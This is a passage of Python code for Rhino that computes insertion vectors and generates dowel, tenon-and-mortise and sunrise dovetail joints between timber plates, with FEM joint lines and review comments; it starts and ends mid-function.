                                    rel2[i][j] = adj[i][j]
                                    search = False
    #self.assembly_relatives = rel2
    self.contact_vectors = iv2
    #coerce geometry of contact spheres to avoid guid instance problem.
    for i in range(len(self.contact_spheres)):
        for j in range(len(self.contact_spheres[i])):
            self.contact_spheres[i][j]=rs.coercegeometry(self.contact_spheres[i][j])
    #assign model attributes
    # NOTE(review): mirrors modules[0]; for flat sequences there is a single
    # (model) module so this is the model itself — confirm for nested ones.
    self.assembly_vectors = self.modules[0].assembly_vectors
    self.assembly_spaces = self.modules[0].assembly_spaces
    self.assembly_relatives = self.modules[0].assembly_relatives
def intersect_insertion_spaces(self, insertion_spaces):
    """
    Intersect unit-sphere insertion spaces and return an insertion vector.

    Returns (vector, candidates): the unit vector from the origin to the
    average of the surviving candidate points, plus the candidates
    themselves. Raises when the spaces have no common direction.

    Hypothesis:
    insertion spaces are points, curves and surfaces
    pts, crvs and srfs are parts of a sphere of radius 1
    crvs are geodesics on that sphere
    crvs are smaller than the hemisphere (L = pi.r)
    srfs have convex perimeters and no holes
    srfs are smaller than the hemisphere (A = 2.pi.r^2)
    Method:
    we start from the most constraining (point to surface)
    we avoid surface intersection using geodesic points
    """
    # Sort insertion_spaces by dimensionality
    pts,crvs,srfs = [],[],[]
    for space in insertion_spaces:
        if rs.IsPoint(space) is True:
            pts.append(space)
        elif rs.IsCurve(space) is True:
            crvs.append(space)
        elif rs.IsBrep(space) is True:
            srfs.append(space)
    geodesic_cloud = Toolbox.Points.geodesic_sphere_points()
    tol = 0.001 # intersection tolerance
    dso = 2 # design space order
    candidates = []
    # Intersection functions (raise when the intersection is empty):
    def pt_pt(pt1, pt2, tol):
        if rs.Distance(pt1,pt2) > tol:
            raise Exception('No pt-pt intersection was found')
    def pt_crv(pt,crv):
        if rs.IsPointOnCurve(crv, pt) is False:
            raise Exception('No pt-crv intersection was found')
    def pts_crv(pts, crv, warning=True):
        # keep only the points lying on the curve
        new_pts = []
        for pt in pts:
            if rs.IsPointOnCurve(crv, pt) is True:
                new_pts.append(pt)
        if new_pts == [] and warning == True:
            raise Exception('No pts-crv intersection was found')
        else: return new_pts
    def pt_srf(pt,srf):
        if rs.IsPointOnSurface(srf, pt) is False:
            raise Exception('No pt-srf intersection was found')
    def pts_srf(pts, srf, tol, warning=True):
        # keep only the points within tol of the surface
        new_pts = []
        for pt in pts:
            srf_pt = rs.BrepClosestPoint(srf,pt)[0]
            if rs.Distance(pt,srf_pt) < tol:
                new_pts.append(pt)
        if new_pts == [] and warning==True:
            raise Exception('No pts-srf intersection was found')
        else: return new_pts
    def crv_crv(crv1, crv2, warning=True):
        inter = rs.CurveCurveIntersection(crv1,crv2)
        if inter == None and warning == True:
            raise Exception('No crv-crv intersection was found')
        else: return inter
    def crv_srf():
        pass
    def srf_srf():
        pass
    def dist_to_srf(srf,pt):
        srf_pt = rs.BrepClosestPoint(srf,pt)[0]
        return rs.Distance(srf_pt,pt)
    def dist_to_crv(crv,pt):
        t = rs.CurveClosestPoint(crv,pt)
        return rs.Distance(rs.EvaluateCurve(crv,t),pt)
    def crv_to_pts(crv):
        # sample the curve every ~0.01 units
        segments = rs.CurveLength(crv) /0.01
        pts = rs.DivideCurve(crv,segments)
        return pts
    def srf_to_pts(srf,geodesic_cloud,edge=True):
        # sample a surface as its border points plus the geodesic-cloud
        # points lying on it (strictly inside the border)
        pts=[]
        border = rs.DuplicateSurfaceBorder(srf,1)
        if edge is True:
            border_pts = crv_to_pts(border)
            for pt in border_pts:
                pts.append(pt)
        for pt in geodesic_cloud:
            pt = rs.AddPoint(pt)
            srf_pt = rs.BrepClosestPoint(srf,pt)[0]
            if rs.Distance(srf_pt,pt) < tol:
                t =rs.CurveClosestPoint(border,pt)
                border_pt = rs.EvaluateCurve(border,t)
                if rs.Distance(border_pt,pt) > tol:
                    pts.append(pt)
        return pts
    # Start from points (most constraining: a single candidate)
    if len(pts) != 0:
        dso = 0
        candidates.append(pts[0])
        #check points
        for i in range(len(pts)-1):
            pt_pt(candidates[0],pts[i+1],tol)
        # check curves
        for crv in crvs:
            pt_crv(candidates[0],crv)
        # check surfaces
        for srf in srfs:
            pt_srf(candidates[0],srf)
    # Start from curves
    elif len(crvs) != 0:
        dso = 1
        candidates = crv_to_pts(crvs[0])
        base_crv = crvs[0]
        #check curves
        for i in range(len(crvs)-1):
            if dso == 1:
                inter = crv_crv(base_crv,crvs[i+1])[0]
                #intersection: a single crossing point collapses the space
                if inter[0] == 1:
                    candidates = [inter[1]]
                    dso = 0
                #overlap: shrink the base curve to the overlapping span
                else:
                    candidates = pts_crv(candidates,crvs[i+1])
                    new_start=rs.CurveClosestPoint(base_crv,candidates[0])
                    new_end=rs.CurveClosestPoint(base_crv,candidates[-1])
                    base_crv=rs.AddSubCrv(base_crv,new_start,new_end)
            else: candidates = pts_crv(candidates,crvs[i+1])
        # check surfaces
        for srf in srfs:
            candidates = pts_srf(candidates,srf,tol)
    # Start from surfaces (least constraining; point sampling avoids srf-srf booleans)
    elif len(srfs) != 0:
        dso = 2
        candidates = srf_to_pts(srfs[0],geodesic_cloud,edge=True)
        # check surfaces
        for i in range(len(srfs)-1):
            candidates = pts_srf(candidates,srfs[i+1],tol,False)
            #complete border: add the next surface's border points kept by all previous surfaces
            border_i = rs.DuplicateSurfaceBorder(srfs[i+1])
            border_points = crv_to_pts(border_i)
            for j in range(i+1):
                border_points = pts_srf(border_points,srfs[j],tol,False)
            candidates = candidates + border_points
            if candidates == []: raise Exception('No srf-srf intersection was found')
    else: raise Exception('Please provide at least one point/curve/surface')
    if len(candidates) == 1:
        chosen = candidates[0]
    elif len(candidates) > 1:
        # average the candidate points component-wise
        l = len(candidates)
        x = 0
        y = 0
        z = 0
        for i in range(len(candidates)):
            if rs.IsPoint(candidates[i]) is False:
                candidates[i] = rs.AddPoint(candidates[i])
            coord = rs.PointCoordinates(candidates[i])
            candidates[i] = rs.coercegeometry(candidates[i])
            x += coord[0]
            y += coord[1]
            z += coord[2]
        x = x/l
        y = y/l
        z = z/l
        chosen = rs.AddPoint(x,y,z)
    vector = rs.VectorUnitize(rs.VectorCreate(chosen,(0,0,0)))
    return (vector, candidates)
# Decorator -----------------------------------
def __skip_nones(fun):
    """
    Decorator to use default value if parameter is null or is an empty list.

    Arguments equal to None or [] are dropped before the call so the
    wrapped function's declared defaults take over.
    """
    def _(*args, **kwargs):
        # keep only meaningful positional arguments, re-keyed by name
        for a, v in zip(fun.__code__.co_varnames, args):
            if v is not None and v!=[]:
                kwargs[a] = v
        # Fix: also drop keyword arguments passed as None/[] — the original
        # only filtered positional arguments, so an explicit keyword None
        # would override the function's default.
        for name in list(kwargs.keys()):
            if kwargs[name] is None or kwargs[name] == []:
                del kwargs[name]
        return fun(**kwargs)
    return _
# PLATE JOINERY ----------------------------------------------
@__skip_nones
def add_dowels(self,
    plates_pairs='all',
    dowel_number=1.0,
    dowel_radius=0.5,
    dowel_tolerance=0.0,
    dowel_retreat_1=0.0,
    dowel_retreat_2=0.0,
    circle_radius=3.0,
    circle_rotation=0.0,
    dowel_angle_1=0.0,
    dowel_angle_2=0.0,
    parallel=False,
    tile=False):
    """Add dowels on Face-to-Face contact zones.

    plates_pairs    : 'all' or a list of '(i,j)' pair strings to target.
    dowel_number    : dowels per contact; >1 are spread on a circle of
                      circle_radius rotated by circle_rotation.
    dowel_radius    : dowel section radius (ignored when a tile curve is given).
    dowel_tolerance : radial offset applied to the boolean (negative) volume.
    dowel_retreat_* : depth reduction into plate i (1) / neighbour (2).
    dowel_angle_1/2 : in-plane orientation / inclination of the dowel axis.
    parallel        : incline all dowels the same way instead of radially.
    tile            : optional custom section geometry replacing the circle.
    """
    #cast plate_pairs to string
    if plates_pairs != 'all':
        for i in range(len(plates_pairs)):
            plates_pairs[i] = str(plates_pairs[i])
    #conditional loop over every contact of every plate
    for i in range(self.count):
        types = self.contact_types[i]
        for j in range(len(types)):
            nb = self.contact_ids[i][j]
            #specific selection function
            if ((plates_pairs == 'all')
                or ('('+str(i)+','+str(nb)+')' == plates_pairs)
                or ('('+str(i)+','+str(nb)+')' in plates_pairs)):
                i_want_a_dowel = True
            else: i_want_a_dowel = False
            #for all specified Face-to-Face connection (nb > i avoids doing each pair twice)
            if (types[j] == 'FF') and (nb > i) and (i_want_a_dowel is True):
                #prerequisite
                if dowel_radius <= 0 : raise Exception(' Dowel_radius must be greater than 0')
                if dowel_number <= 0 : raise Exception(' Dowel_number must be greater than 0')
                if dowel_tolerance < 0 : raise Exception(' Dowel_tolerance must be greater than 0')
                if dowel_retreat_1 >= self.plates[i].thickness : raise Exception(' Dowel_retreat_1 must be smaller than plate '+str(i)+' thickness')
                if dowel_retreat_2 >= self.plates[nb].thickness : raise Exception(' Dowel_retreat_2 must be smaller than plate '+str(nb)+' thickness')
                if circle_radius <= 0 : raise Exception(' Circle_radius must be greater than 0')
                if not (-180.0 <= dowel_angle_1 <= 180.0) : raise Exception(' Dowel_angle_1 must be between -180 and 180')
                # Fix: the message named Dowel_angle_1 although the check is on dowel_angle_2.
                if not (-45.0 <= dowel_angle_2 <= 45.0) : raise Exception(' Dowel_angle_2 must be between -45 and 45')
                #location: one plane per dowel on the contact plane
                plane = self.contact_planes[i][j]
                location=[]
                if dowel_number == 1:
                    location.append(plane)
                elif dowel_number > 1:
                    polygon = Toolbox.Curves.create_polygon(plane, circle_radius, dowel_number)
                    polygon = rs.RotateObject(polygon, plane.Origin, circle_rotation, plane.ZAxis)
                    vertices = rs.PolylineVertices(polygon)
                    for k in range(len(vertices)-1):
                        x_axis = rs.VectorCreate(plane.Origin,vertices[k])
                        new_plane = rs.PlaneFromNormal(vertices[k], plane.ZAxis, x_axis)
                        location.append(new_plane)
                if tile != False :
                    tile = scriptcontext.doc.Objects.Add(tile)
                for k in range(len(location)):
                    #construction lines: dowel section at each location plane
                    if tile == False :
                        base_circle = rs.AddCircle(location[k],float(dowel_radius))
                    else :
                        # NOTE(review): x_target/y_target appear unused afterwards — confirm
                        # whether the document objects they add are relied upon elsewhere.
                        x_target = rs.CopyObject(location[k].Origin, location[k].XAxis)
                        y_target = rs.CopyObject(location[k].Origin, location[k].YAxis)
                        base_circle = Toolbox.Planes.orient(tile, rs.WorldXYPlane(), rs.RotatePlane(location[k], 90, location[k].ZAxis))
                    top_circle = rs.CopyObject(base_circle, self.contact_normals[i][j] * (self.plates[nb].thickness - dowel_retreat_2))
                    bottom_circle = rs.CopyObject(base_circle, -self.contact_normals[i][j] * (self.plates[i].thickness - dowel_retreat_1))
                    #inclination: shear top/bottom sections along the reference X axis
                    if (-180 <= dowel_angle_1 <= 180) and (-45 <= dowel_angle_2 <= 45) :
                        if parallel is True :
                            ref = rs.PlaneFromFrame(plane.Origin,plane.XAxis,plane.YAxis)
                            ref = rs.RotatePlane(ref, dowel_angle_1, ref.ZAxis)
                        else :
                            x_axis = rs.VectorCreate(plane.Origin, location[k].Origin)
                            ref = rs.PlaneFromNormal(location[k].Origin, plane.ZAxis, x_axis)
                        top_move = (self.plates[nb].thickness - dowel_retreat_2) * math.tan(math.radians(dowel_angle_2)) * ref.XAxis
                        bottom_move = (self.plates[i].thickness - dowel_retreat_1) * math.tan(math.radians(dowel_angle_2)) * -ref.XAxis
                        rs.MoveObject(top_circle,top_move)
                        rs.MoveObject(bottom_circle,bottom_move)
                    #keys geometry: the physical dowel cylinder
                    rail = rs.AddLine(rs.CurveAreaCentroid(bottom_circle)[0],rs.CurveAreaCentroid(top_circle)[0])
                    cylinder = rs.ExtrudeCurve(bottom_circle, rail)
                    rs.CapPlanarHoles(cylinder)
                    self.plates[nb].joints_keys.append(rs.coercebrep(cylinder))
                    #solid: negative volumes to subtract from each plate (with tolerance)
                    base_circle_bool = Toolbox.Curves.offset(base_circle, - dowel_tolerance)
                    rail_top = rs.AddLine(rs.CurveAreaCentroid(base_circle)[0],rs.CurveAreaCentroid(top_circle)[0])
                    cylinder_top = rs.ExtrudeCurve(base_circle_bool, rail_top)
                    rail_bottom = rs.AddLine(rs.CurveAreaCentroid(base_circle)[0],rs.CurveAreaCentroid(bottom_circle)[0])
                    cylinder_bottom = rs.ExtrudeCurve(base_circle_bool, rail_bottom)
                    rs.CapPlanarHoles(cylinder_top)
                    rs.CapPlanarHoles(cylinder_bottom)
                    self.plates[i].joints_negatives.append(rs.coercebrep(cylinder_bottom))
                    self.plates[nb].joints_negatives.append(rs.coercebrep(cylinder_top))
                    #fabrication lines
                    top_poly = rs.ConvertCurveToPolyline(top_circle, 10)
                    bottom_poly = rs.ConvertCurveToPolyline(bottom_circle, 10)
                    base_poly = rs.ConvertCurveToPolyline(base_circle, 10)
                    # Fix: the retreat==0 and retreat!=0 branches appended exactly the
                    # same curves, so the conditionals were dead code — collapsed.
                    self.plates[i].top_holes.append(rs.coercecurve(base_poly))
                    self.plates[i].bottom_holes.append(rs.coercecurve(bottom_poly))
                    self.plates[nb].top_holes.append(rs.coercecurve(top_poly))
                    self.plates[nb].bottom_holes.append(rs.coercecurve(base_poly))
                self.log.append('Dowel joint added bewteen plates '+ str(i)+ ' and '+str(nb))
@__skip_nones
def add_tenons(self,
        plates_pairs='all',
        tenon_number=1.0,
        tenon_length='default',
        tenon_width=1.0,
        tenon_spacing=1.0,
        tenon_shift=0.0,):
    """Add tenon and mortise on Side-to-Face or Face-to-Side contact zones.

    Parameters:
        plates_pairs: 'all' or a list of '(a,b)' pair strings selecting
            which plate pairs receive a joint (either order is accepted).
        tenon_number: number of tenons per contact zone (must be > 0).
        tenon_length: 'default' (or 0) derives the length from the female
            plate thickness and the insertion angle; any other value is
            used directly.
        tenon_width: width of one tenon (must be > 0).
        tenon_spacing: distance between consecutive tenons.
        tenon_shift: lateral offset of the whole tenon row.

    Side effects: appends solids to joints_positives/joints_negatives,
    rewrites the male plate contours, punches holes in the female plate,
    and adds one FEM joint line per tenon.
    """
    #cast plate_pairs to string
    if plates_pairs != 'all':
        for i in range(len(plates_pairs)):
            plates_pairs[i] = str(plates_pairs[i])
    #conditional loop over every contact of every plate
    for i in range(self.count):
        types = self.contact_types[i]
        for j in range(len(types)):
            nb = self.contact_ids[i][j]
            #specific selection function (pair accepted in either order)
            if ((plates_pairs == 'all')
                    or ('('+str(i)+','+str(nb)+')' == plates_pairs)
                    or ('('+str(i)+','+str(nb)+')' in plates_pairs)
                    or ('('+str(nb)+','+str(i)+')' == plates_pairs)
                    or ('('+str(nb)+','+str(i)+')' in plates_pairs)):
                i_want_a_tenon = True
            else: i_want_a_tenon = False
            #for all specified Side-to-Face connection
            #NOTE(review): `types[j] in 'SFS'` is a substring test, so it
            #also matches a bare 'S' — confirm only 'SF'/'FS' can occur here.
            if (types[j] in 'SFS') and (nb > i) and i_want_a_tenon is True:
                #prerequisite
                if tenon_number <= 0 : raise Exception(' Tenon_number must be greater than 0')
                if tenon_width <= 0 : raise Exception(' Tenon_width must be greater than 0')
                #male-female parameters (male carries the tenon)
                if types[j] == 'SF':
                    male = i
                    female = nb
                    plane_zone = rs.PlaneFromFrame(self.contact_planes[i][j].Origin, self.contact_planes[i][j].XAxis, self.contact_planes[i][j].YAxis)
                if types[j] == 'FS':
                    male = nb
                    female = i
                    #axes swapped so the zone plane is expressed from the male side
                    plane_zone = rs.PlaneFromFrame(self.contact_planes[i][j].Origin, self.contact_planes[i][j].YAxis, self.contact_planes[i][j].XAxis)
                plane_male = self.plates[male].top_plane
                plane_female = self.plates[female].top_plane
                thickness_female = self.plates[female].thickness
                #deep copies: contours are modified below, keep originals for closest-point queries
                top_contour_male = copy.deepcopy(self.plates[male].top_contour)
                bottom_contour_male = copy.deepcopy(self.plates[male].bottom_contour)
                top_contour_mstart = rs.CurveStartPoint(top_contour_male)
                bottom_contour_mstart= rs.CurveStartPoint(bottom_contour_male)
                """""" # (stray empty string literal left by the author; no-op)
                #joint location: fit a rectangle on the contact zone outline
                zone = self.contact_zones[i][j]
                rectangle = Toolbox.Curves.trapeze_to_rectangle(rs.JoinCurves(rs.DuplicateEdgeCurves(zone)))
                if Toolbox.Curves.rectangle_dimensions(rectangle)[0] < (tenon_width*tenon_number + tenon_spacing*(tenon_number-1) + tenon_shift*2):
                    excess = (tenon_width*tenon_number + tenon_spacing*(tenon_number-1) + tenon_shift*2) / (Toolbox.Curves.rectangle_dimensions(rectangle)[0]) * 100
                    raise Exception(' Joint is to large ('+ str(int(excess)) +' %) for contact area between plate '+str(i)+' and plate '+str(nb))
                center = rs.CurveAreaCentroid(rectangle)[0]
                default_direction = Toolbox.Vectors.project_vector_to_plane(plane_zone.ZAxis, plane_male)
                joint_plane = rs.PlaneFromNormal(center, plane_male.ZAxis, default_direction)
                #direction for assembly (flipped depending on which plate is male)
                if types[j] == 'FS': direction = self.contact_vectors[i][j]
                if types[j] == 'SF': direction = -self.contact_vectors[i][j]
                #default length: female thickness projected along the insertion direction
                if (tenon_length == 'default') or (tenon_length == 0) :
                    # plane_female[3] — presumably the plane's ZAxis; TODO confirm
                    alpha = rs.VectorAngle(direction, plane_female[3])
                    new_tenon_length = abs(thickness_female / math.cos(math.radians(alpha)))
                else: new_tenon_length = tenon_length
                #tenon location: spread tenon centers along a (shifted) line
                if tenon_number > 1 :
                    dist = (float(tenon_number-1) /2) * (tenon_width + tenon_spacing)
                    pointA = rs.CopyObject(joint_plane.Origin, joint_plane.YAxis * dist)
                    pointB = rs.CopyObject(joint_plane.Origin, -joint_plane.YAxis * dist)
                    line = rs.AddLine(pointA, pointB)
                    shifted_line = rs.CopyObject(line, joint_plane.YAxis * tenon_shift)
                    location = rs.DivideCurve(shifted_line, tenon_number-1)
                else: location = [rs.CopyObject(joint_plane.Origin, joint_plane.YAxis * tenon_shift)]
                #solid
                for k in range(len(location)):
                    #tenon box: rectangle at the joint, copied to top and bottom contours
                    point1 = rs.CopyObject(location[k], joint_plane.YAxis * tenon_width/2)
                    point4 = rs.CopyObject(location[k], -joint_plane.YAxis * tenon_width/2)
                    point2 = rs.CopyObject(point1, direction * new_tenon_length)
                    point3 = rs.CopyObject(point4, direction * new_tenon_length)
                    polyline = rs.AddPolyline([point1, point2, point3, point4, point1])
                    top_point = Toolbox.Curves.curve_closest_point(top_contour_male, joint_plane.Origin)
                    top_poly = rs.CopyObject(polyline, rs.VectorCreate(top_point, joint_plane.Origin))
                    bottom_point = Toolbox.Curves.curve_closest_point(bottom_contour_male, joint_plane.Origin)
                    bottom_poly = rs.CopyObject(polyline, rs.VectorCreate(bottom_point, joint_plane.Origin))
                    tenon_box = rs.coercebrep(Toolbox.Breps.box_from_2_poly(top_poly, bottom_poly))
                    """
                    #slice joint
                    top_plane = rs.coerceplane(self.plates[i].top_plane)
                    bottom_plane = rs.coerceplane(self.plates[i].bottom_plane)
                    tenon_box = Toolbox.Breps.slice_2_planes(tenon_box, top_plane, bottom_plane)
                    """
                    #append: same box acts as positive (male) and negative (female)
                    self.plates[male].joints_positives.append(rs.coercebrep(rs.CopyObject(tenon_box)))
                    self.plates[female].joints_negatives.append(rs.coercebrep(rs.CopyObject(tenon_box)))
                # update contour lines
                for k in range(len(location)):
                    # male part: open polyline spliced into the male contours
                    point1 = rs.CopyObject(location[k], joint_plane.YAxis * (tenon_width/2 + tenon_spacing/2))
                    point2 = rs.CopyObject(location[k], joint_plane.YAxis * tenon_width/2)
                    point5 = rs.CopyObject(location[k], -joint_plane.YAxis * tenon_width/2)
                    point6 = rs.CopyObject(location[k], -joint_plane.YAxis * (tenon_width/2 + tenon_spacing/2))
                    point3 = rs.CopyObject(point2, direction * new_tenon_length)
                    point4 = rs.CopyObject(point5, direction * new_tenon_length)
                    polyline = rs.AddPolyline([point2, point3, point4, point5])
                    top_point = Toolbox.Curves.curve_closest_point(top_contour_male, joint_plane.Origin)
                    top_poly = rs.CopyObject(polyline, rs.VectorCreate(top_point, joint_plane.Origin))
                    bottom_point = Toolbox.Curves.curve_closest_point(bottom_contour_male, joint_plane.Origin)
                    bottom_poly = rs.CopyObject(polyline, rs.VectorCreate(bottom_point, joint_plane.Origin))
                    self.plates[male].top_contour = Toolbox.Curves.insert_curves(self.plates[male].top_contour, [top_poly], top_contour_mstart)
                    self.plates[male].bottom_contour = Toolbox.Curves.insert_curves(self.plates[male].bottom_contour, [bottom_poly], bottom_contour_mstart)
                    # female part: closed mortise rectangles added as holes
                    # mod shifts the vertex indexing when spacing is ~zero
                    mod = 0
                    if tenon_spacing < 0.0001 : mod = -1
                    point1 = rs.PolylineVertices(top_poly)[0 + mod]
                    point2 = rs.PolylineVertices(top_poly)[3 + mod]
                    point3 = rs.PolylineVertices(bottom_poly)[3 + mod]
                    point4 = rs.PolylineVertices(bottom_poly)[0 + mod]
                    point5 = rs.PolylineVertices(top_poly)[1 + mod]
                    point6 = rs.PolylineVertices(top_poly)[2 + mod]
                    point7 = rs.PolylineVertices(bottom_poly)[2 + mod]
                    point8 = rs.PolylineVertices(bottom_poly)[1 + mod]
                    top_poly = rs.AddPolyline([point1, point2, point3, point4, point1])
                    bottom_poly = rs.AddPolyline([point5, point6, point7, point8, point5])
                    self.plates[female].top_holes.append(rs.coercecurve(top_poly))
                    self.plates[female].bottom_holes.append(rs.coercecurve(bottom_poly))
                self.log.append('Tenon joint added bewteen plates '+str(i)+ ' and '+ str(nb))
                # Structural analysis: insert one FEM joint line per tenon,
                # round-tripping the curves through the document to add knots
                for k in range(len(location)):
                    pm=rs.CurveClosestPoint(self.FEM_plates[male],location[k])
                    pf=rs.CurveClosestPoint(self.FEM_plates[female],location[k])
                    self.FEM_plates[male] = scriptcontext.doc.Objects.Add(self.FEM_plates[male])
                    self.FEM_plates[female] = scriptcontext.doc.Objects.Add(self.FEM_plates[female])
                    joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[male],pm), rs.EvaluateCurve(self.FEM_plates[female],pf))
                    rs.InsertCurveKnot(self.FEM_plates[male],pm)
                    rs.InsertCurveKnot(self.FEM_plates[female],pf)
                    self.FEM_plates[male] = rs.coercecurve(self.FEM_plates[male])
                    self.FEM_plates[female] = rs.coercecurve(self.FEM_plates[female])
                    self.FEM_joints.append(rs.coercecurve(joint_line))
                pass
@__skip_nones
def add_sunrise(self,
        plates_pairs='all',
        tenon_number=2,
        tenon_width=1.0,
        tenon_spacing=1.0,
        tenon_shift=0.0,
        spread_angle=0.0,
        parallel_tenons=False,
        custom_insertion=None):
    """ Add a sunrise dovetail on Edgewise contact zones.

    Parameters:
        plates_pairs: 'all' or a list of '(a,b)' pair strings selecting
            which plate pairs receive a joint (either order is accepted).
        tenon_number: number of dovetail tenons per contact (>= 1).
        tenon_width: width of one tenon (> 0).
        tenon_spacing: distance between consecutive tenons (> 0).
        tenon_shift: lateral offset of the whole tenon row.
        spread_angle: fan-out angle of the tenon flanks (degrees); sign is
            flipped for 'SE' contacts so the fan always opens outward.
        parallel_tenons: if True each tenon keeps parallel flanks (the fan
            rotates whole tenons instead of spreading their flanks).
        custom_insertion: optional vector overriding the contact insertion
            direction.

    Side effects: may flip plate top/bottom orientation, appends joint
    solids, splices the dovetail outline into both plates' contours and
    extends the FEM model with one joint line per tenon.
    """
    #cast plate_pairs to string
    if plates_pairs != 'all':
        for i in range(len(plates_pairs)):
            plates_pairs[i] = str(plates_pairs[i])
    #conditional loop over every contact of every plate
    for i in range(self.count):
        types = self.contact_types[i]
        for j in range(len(types)):
            nb = self.contact_ids[i][j]
            # Specific selection function (pair accepted in either order)
            if ((plates_pairs == 'all')
                    or ('('+str(i)+','+str(nb)+')' == plates_pairs)
                    or ('('+str(i)+','+str(nb)+')' in plates_pairs)
                    or ('('+str(nb)+','+str(i)+')' == plates_pairs)
                    or ('('+str(nb)+','+str(i)+')' in plates_pairs)):
                i_want_a_tenon = True
            else: i_want_a_tenon = False
            # For all specified Edgewise connection
            # NOTE(review): `types[j] in 'SES'` is a substring test ('SE',
            # 'ES', but also bare 'S' or 'E') — confirm intended.
            if (types[j] in 'SES') and (nb > i) and i_want_a_tenon is True:
                # Prerequisite
                if tenon_number < 1 : raise Exception('tenon_number must be greater than 1')
                if tenon_width <= 0 : raise Exception('tenon_width must be greater than 0')
                if tenon_spacing <= 0 : raise Exception('tenon_spacing must be greater than 0')
                #deal with male/female
                nb = self.contact_ids[i][j]
                if types[j] == 'SE':
                    # NOTE(review): mutates the parameter, so the sign flip
                    # accumulates across successive 'SE' contacts — verify.
                    spread_angle=-spread_angle
                    male, female = i, nb
                else: male, female = nb, i
                #compute plane angles: two entries per tenon (one per flank)
                angles = []
                if parallel_tenons is True:
                    if tenon_number == 1: angles = [0,0]
                    else:
                        for k in range(tenon_number):
                            #same angle appended twice so both flanks stay parallel
                            angles.append(- spread_angle + 2*k*spread_angle/(tenon_number-1))
                            angles.append(- spread_angle + 2*k*spread_angle/(tenon_number-1))
                else:
                    for k in range(2*tenon_number):
                        angles.append(- spread_angle + 2*k*(spread_angle/(2*tenon_number-1)))
                #tenon locations spread along the contact plane X axis
                cp = self.contact_planes[i][j]
                if tenon_number > 1 :
                    dist = (float(tenon_number-1) /2) * (tenon_width + tenon_spacing)
                    pointA = rs.CopyObject(cp.Origin, cp.XAxis * dist)
                    pointB = rs.CopyObject(cp.Origin, -cp.XAxis * dist)
                    line = rs.AddLine(pointA, pointB)
                    shifted_line = rs.CopyObject(line, cp.XAxis * tenon_shift)
                    location = rs.DivideCurve(shifted_line, tenon_number-1)
                else: location = [rs.CopyObject(cp.Origin, cp.XAxis * tenon_shift)]
                #get insertion vector
                vec = self.contact_vectors[i][j]
                if custom_insertion != None: vec=custom_insertion
                #get and reorder top/bottom so the planes face the contact
                tpf = self.plates[female].top_plane
                bpf = self.plates[female].bottom_plane
                if rs.Distance(tpf.Origin, cp.Origin) < rs.Distance(bpf.Origin, cp.Origin):
                    self.switch_top_bottom(plates=[female])
                    # NOTE(review): tpf/bpf are not re-read after the switch,
                    # unlike tpm/bpm below — confirm switch_top_bottom
                    # mutates the plane objects in place.
                tpm = self.plates[male].top_plane
                bpm = self.plates[male].bottom_plane
                tcf = self.plates[female].top_center
                bcf = self.plates[female].bottom_center
                if rs.Distance(tpm.Origin, bcf) < rs.Distance(bpm.Origin, bcf):
                    self.switch_top_bottom(plates=[male])
                    tpm = self.plates[male].top_plane
                    bpm = self.plates[male].bottom_plane
                #create tenons
                m_poly_top=[]
                m_poly_bottom=[]
                f_poly_top=[]
                f_poly_bottom=[]
                for k in range(tenon_number):
                    #plane_location: one rotated flank plane on each side of the tenon
                    rot_vec_1 = rs.VectorRotate(cp.YAxis, angles[2*k], cp.ZAxis)
                    rot_vec_2 = rs.VectorRotate(cp.YAxis, angles[2*k+1], cp.ZAxis)
                    loc1= rs.CopyObject(location[k], cp.XAxis * tenon_width/2)
                    loc2= rs.CopyObject(location[k], cp.XAxis * -tenon_width/2)
                    pl1 = rs.PlaneFromFrame(loc1,vec,rot_vec_1)
                    pl2 = rs.PlaneFromFrame(loc2,vec,rot_vec_2)
                    #degenerate case: insertion vector parallel to YAxis
                    if rs.IsVectorParallelTo(cp.YAxis, vec) !=0:
                        pl1 = rs.PlaneFromFrame(loc1,vec,cp.ZAxis)
                        pl2 = rs.PlaneFromFrame(loc2,vec,cp.ZAxis)
                    #solid creation bounded by the 6 planes; ensure outward orientation
                    solid = rs.coercebrep(Toolbox.Breps.box_from_6_planes([pl1,pl2],[tpm,bpm],[tpf,bpf]))
                    if solid.SolidOrientation == rg.BrepSolidOrientation.Inward: rg.Brep.Flip(solid)
                    self.plates[male].joints_positives.append(copy.deepcopy(solid))
                    self.plates[female].joints_negatives.append(copy.deepcopy(solid))
                    #contour creation: corner points from triple plane intersections
                    m_poly_top.append(Toolbox.Planes.three_planes_intersection(bpf,tpm,pl1))
                    m_poly_top.append(Toolbox.Planes.three_planes_intersection(tpf,tpm,pl1))
                    m_poly_top.append(Toolbox.Planes.three_planes_intersection(tpf,tpm,pl2))
                    m_poly_top.append(Toolbox.Planes.three_planes_intersection(bpf,tpm,pl2))
                    m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpf,bpm,pl1))
                    m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpf,bpm,pl1))
                    m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpf,bpm,pl2))
                    m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpf,bpm,pl2))
                    f_poly_top.append(Toolbox.Planes.three_planes_intersection(tpm,tpf,pl1))
                    f_poly_top.append(Toolbox.Planes.three_planes_intersection(bpm,tpf,pl1))
                    f_poly_top.append(Toolbox.Planes.three_planes_intersection(bpm,tpf,pl2))
                    f_poly_top.append(Toolbox.Planes.three_planes_intersection(tpm,tpf,pl2))
                    f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpm,bpf,pl1))
                    f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpm,bpf,pl1))
                    f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpm,bpf,pl2))
                    f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpm,bpf,pl2))
                #splice the dovetail outlines into both plates' contours
                self.plates[male].top_contour = Toolbox.Curves.insert_curves(self.plates[male].top_contour, [rs.AddPolyline(m_poly_top)])
                self.plates[male].bottom_contour = Toolbox.Curves.insert_curves(self.plates[male].bottom_contour, [rs.AddPolyline(m_poly_bottom)])
                self.plates[female].top_contour = Toolbox.Curves.insert_curves(self.plates[female].top_contour, [rs.AddPolyline(f_poly_top)])
                self.plates[female].bottom_contour = Toolbox.Curves.insert_curves(self.plates[female].bottom_contour, [rs.AddPolyline(f_poly_bottom)])
                # Structural analysis: one FEM joint line per tenon,
                # round-tripping the curves through the document to add knots
                for k in range(len(location)):
                    pm=rs.CurveClosestPoint(self.FEM_plates[male],location[k])
